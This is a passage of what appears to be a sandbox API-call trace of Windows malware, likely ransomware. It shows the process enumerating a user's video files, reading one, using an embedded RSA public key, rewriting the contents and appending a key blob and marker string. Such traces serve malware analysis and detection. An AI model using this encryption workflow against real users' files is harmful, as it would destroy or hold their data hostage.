hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.521] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0238.523] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d0c3670, ftCreationTime.dwHighDateTime=0x1d5c216, ftLastAccessTime.dwLowDateTime=0xc8a22710, ftLastAccessTime.dwHighDateTime=0x1d5bed1, ftLastWriteTime.dwLowDateTime=0xc8a22710, ftLastWriteTime.dwHighDateTime=0x1d5bed1, nFileSizeHigh=0x0, nFileSizeLow=0x108f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4_j2A_i5bsYCdo_.avi", cAlternateFileName="4_J2A_~1.AVI")) returned 1 [0238.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0238.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.523] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\4_j2A_i5bsYCdo_.avi") returned=".avi" [0238.523] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\4_j2A_i5bsYCdo_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\4_j2a_i5bsycdo_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.524] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=67833) returned 1 [0238.524] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.527] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x108d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.527] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.530] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.530] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x108f9, lpOverlapped=0x0) returned 1 [0238.531] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.531] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.531] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.531] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.532] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.532] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.532] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.532] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.532] GetLastError () returned 0x0 [0238.532] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.532] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.533] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.533] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.533] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10900) returned 0x3b95d50 [0238.533] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b85ee0 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a88 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b85f28 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400aa0 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ad0 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b30 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ae8 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.534] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ad0 | out: hHeap=0x620000) returned 1 [0238.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ae8 | out: hHeap=0x620000) returned 1 [0238.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b30 | out: hHeap=0x620000) returned 1 [0238.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b30 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400ae8 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400ad0 [0238.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0238.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0238.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0238.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ae8 | out: hHeap=0x620000) returned 1 [0238.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ad0 | out: hHeap=0x620000) returned 1 [0238.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b30 | out: hHeap=0x620000) returned 1 [0238.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.535] GetCurrentThreadId () returned 0x5b4 [0238.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b86fb8 [0238.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.536] GetCurrentThreadId () returned 0x5b4 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b30 [0238.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ad0 [0238.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0238.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400ae8 [0238.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ab8 [0238.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b48 [0238.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b18 [0238.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b00 [0238.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b60 [0238.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b00 | out: hHeap=0x620000) returned 1 [0238.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b00 [0238.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b18 | out: hHeap=0x620000) returned 1 [0238.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ad0 | out: hHeap=0x620000) returned 1 [0238.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400ad0 [0238.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0238.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b30 | out: hHeap=0x620000) returned 1 [0238.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0238.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b60 | out: hHeap=0x620000) returned 1 [0238.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0238.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0238.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0238.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ad0 | out: hHeap=0x620000) returned 1 [0238.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0238.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b00 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b48 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ae8 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ab8 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400aa0 | out: hHeap=0x620000) returned 1 [0238.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b85f28 | out: hHeap=0x620000) returned 1 [0238.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.541] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x108f4, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x108f4, lpOverlapped=0x0) returned 1 [0238.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0238.542] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x108f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.542] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0238.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0238.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b88cd0 [0238.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0238.542] WriteFile (in: hFile=0x644, lpBuffer=0x3b88cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b88cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.542] lstrlenA 